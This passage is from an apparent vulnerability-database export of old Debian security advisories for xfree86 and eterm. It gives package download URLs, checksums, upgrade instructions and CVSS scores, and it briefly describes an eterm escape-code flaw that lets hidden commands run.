9c64df737851dbb285c97c8976a258bd\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 221040 9811b497f7342362d8c330c4d5e93a17\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dbg_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 453412 f82dd9593feae20d1861646c7221f536\n http://security.debian.org/pool/updates/main/x/xfree86/libxaw7-dev_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 308184 f46dab3dbd3acb82c01684b2e77da3c9\n http://security.debian.org/pool/updates/main/x/xfree86/proxymngr_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 78414 bdfce1719012c413f22e734f8183be16\n http://security.debian.org/pool/updates/main/x/xfree86/twm_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 162666 83e2e8bc88b1cde62ea3ae22a24ca4d3\n http://security.debian.org/pool/updates/main/x/xfree86/x-window-system-core_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 59838 a673c21e2a8e4d0b4081eb782d48c5b3\n http://security.debian.org/pool/updates/main/x/xfree86/xbase-clients_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 1710126 3a1307643e204b0a46d9350e7f54d742\n http://security.debian.org/pool/updates/main/x/xfree86/xdm_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 173016 012fd6e67af87ee07906074d54af3bf5\n http://security.debian.org/pool/updates/main/x/xfree86/xfs_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 301704 339b18005943d5ff8f34b55b8c8da0f2\n http://security.debian.org/pool/updates/main/x/xfree86/xfwp_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 83546 e5bfb480b7df9adf03407c13adfbde7e\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa-dev_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 586074 693633684786309eb74e6a07a729d635\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 885302 6f70d5dbe7537ac8578bee9ad96e67c6\n http://security.debian.org/pool/updates/main/x/xfree86/xlibmesa3-dbg_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 907794 247d0788269c04693020eaa17c476ff9\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa-dev_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 612136 a2dc9b3127ed19a50e78a2a70f4a0fd2\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 552918 373e63088fea725e6ee638f26743842c\n http://security.debian.org/pool/updates/main/x/xfree86/xlibosmesa3-dbg_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 1103404 d77957a91655b93a0011116ed3dc9d4a\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 1261944 e911ce78e98c43d852a5e9244f0efc92\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dbg_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 2646532 0b7ad3c005191356ca8e594f58f714c9\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-dev_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 2865794 43865b2731458ae12664eacb024adf48\n http://security.debian.org/pool/updates/main/x/xfree86/xlibs-pic_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 75046 0e6ee7083f0eea2229dc892a41675ba8\n http://security.debian.org/pool/updates/main/x/xfree86/xmh_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 130014 476e6ca85217b03c78d0ce7e97528c2f\n http://security.debian.org/pool/updates/main/x/xfree86/xnest_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 1536206 fe5aa54c4bb62718d2e8a807d4514618\n http://security.debian.org/pool/updates/main/x/xfree86/xprt_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 1202178 1c4ba87a43082e76a13db794b6f2b300\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-common_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 222258 971dccac12030b8e4cc197b8302e52d2\n http://security.debian.org/pool/updates/main/x/xfree86/xserver-xfree86_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 4049526 91aef4bc93275b1f4b6b2f94be55800d\n http://security.debian.org/pool/updates/main/x/xfree86/xterm_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 491118 aeca08d4f1d6ec40c2bb8b7114af3e98\n http://security.debian.org/pool/updates/main/x/xfree86/xutils_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 644266 2fea94acb1d733c67991422aef192b55\n http://security.debian.org/pool/updates/main/x/xfree86/xvfb_4.1.0-16woody1_sparc.deb\n Size/MD5 checksum: 1648504 0155bde2b496d30292bfda05ef0c6c7a\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2003-09-12T18:55:36", "type": "debian", "title": "[SECURITY] [DSA-380-1] New xfree86 packages fix multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0164", "CVE-2003-0063", "CVE-2003-0071", "CVE-2003-0730"], "modified": "2003-09-12T18:55:36", "id": "DEBIAN:DSA-380-1:9672A", "href": "https://lists.debian.org/debian-security-announce/2003/msg00185.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-29T14:07:39", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 496-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 29th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : eterm\nVulnerability : missing input sanitising\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2003-0068\nDebian Bug : 244808\n\nH.D. Moore discovered several terminal emulator security issues. One\nof them covers escape codes that are interepreted by the terminal\nemulator. This could be exploited by an attacker to insert malicious\ncommands hidden for the user, who has to hit enter to continue, which\nwould also execute the hidden commands.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.9.2-0pre2002042903.3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion eterm-0.9.2-6.\n\nWe recommend that you upgrade your eterm package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3.dsc\n Size/MD5 checksum: 580 8dd9405e97daadcc36d2a5567df12426\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3.tar.gz\n Size/MD5 checksum: 669587 4690c66ab263457814d6800a6eee9677\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_alpha.deb\n Size/MD5 checksum: 389948 f1b70024aa0cfb527fc42db5c8fd523b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_arm.deb\n Size/MD5 checksum: 374172 a35e3d97314e32cc90eab9ba19e87d3a\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_i386.deb\n Size/MD5 checksum: 332370 0179b15476844c00173d17d6f15c728c\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_ia64.deb\n Size/MD5 checksum: 450200 db01699764205f0e7c8b643ffb0a903d\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_hppa.deb\n Size/MD5 checksum: 390284 8b13e7fe3ed441b534c4c774c62cdb7e\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_m68k.deb\n Size/MD5 checksum: 336784 eb98128c5b89f91c2b1ccc6375ae2497\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_mips.deb\n Size/MD5 checksum: 335892 01e766279f9a70b749fe6fbe4eb05f04\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_mipsel.deb\n Size/MD5 checksum: 335070 4ec83c9bb3f874f6e68b822588cc2f25\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_powerpc.deb\n Size/MD5 checksum: 365352 f129cf9a14150e45a60158560f9668d8\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_s390.deb\n Size/MD5 checksum: 356112 29a7e88d5753361949e1240450f6ac85\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_sparc.deb\n Size/MD5 checksum: 368946 64afcd5edbccd980d8b2f97f09c657dd\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2004-04-29T10:30:44", "type": "debian", "title": "[SECURITY] [DSA 496-1] New eterm packages fix indirect arbitrary command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0068"], "modified": "2004-04-29T10:30:44", "id": "DEBIAN:DSA-496-1:F500E", "href": "https://lists.debian.org/debian-security-announce/2004/msg00096.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-23T14:54:59", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 496-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nApril 29th, 2004 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : eterm\nVulnerability : missing input sanitising\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2003-0068\nDebian Bug : 244808\n\nH.D. Moore discovered several terminal emulator security issues. One\nof them covers escape codes that are interepreted by the terminal\nemulator. This could be exploited by an attacker to insert malicious\ncommands hidden for the user, who has to hit enter to continue, which\nwould also execute the hidden commands.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 0.9.2-0pre2002042903.3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion eterm-0.9.2-6.\n\nWe recommend that you upgrade your eterm package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3.dsc\n Size/MD5 checksum: 580 8dd9405e97daadcc36d2a5567df12426\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3.tar.gz\n Size/MD5 checksum: 669587 4690c66ab263457814d6800a6eee9677\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_alpha.deb\n Size/MD5 checksum: 389948 f1b70024aa0cfb527fc42db5c8fd523b\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_arm.deb\n Size/MD5 checksum: 374172 a35e3d97314e32cc90eab9ba19e87d3a\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_i386.deb\n Size/MD5 checksum: 332370 0179b15476844c00173d17d6f15c728c\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_ia64.deb\n Size/MD5 checksum: 450200 db01699764205f0e7c8b643ffb0a903d\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_hppa.deb\n Size/MD5 checksum: 390284 8b13e7fe3ed441b534c4c774c62cdb7e\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_m68k.deb\n Size/MD5 checksum: 336784 eb98128c5b89f91c2b1ccc6375ae2497\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_mips.deb\n Size/MD5 checksum: 335892 01e766279f9a70b749fe6fbe4eb05f04\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_mipsel.deb\n Size/MD5 checksum: 335070 4ec83c9bb3f874f6e68b822588cc2f25\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_powerpc.deb\n Size/MD5 checksum: 365352 f129cf9a14150e45a60158560f9668d8\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_s390.deb\n Size/MD5 checksum: 356112 29a7e88d5753361949e1240450f6ac85\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/e/eterm/eterm_0.9.2-0pre2002042903.3_sparc.deb\n Size/MD5 checksum: 368946 64afcd5edbccd980d8b2f97f09c657dd\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2004-04-29T10:30:44", "type": "debian", "title": "[SECURITY] [DSA 496-1] New eterm packages fix indirect arbitrary command execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "o

Terminal Emulator Security Issues

Description

Related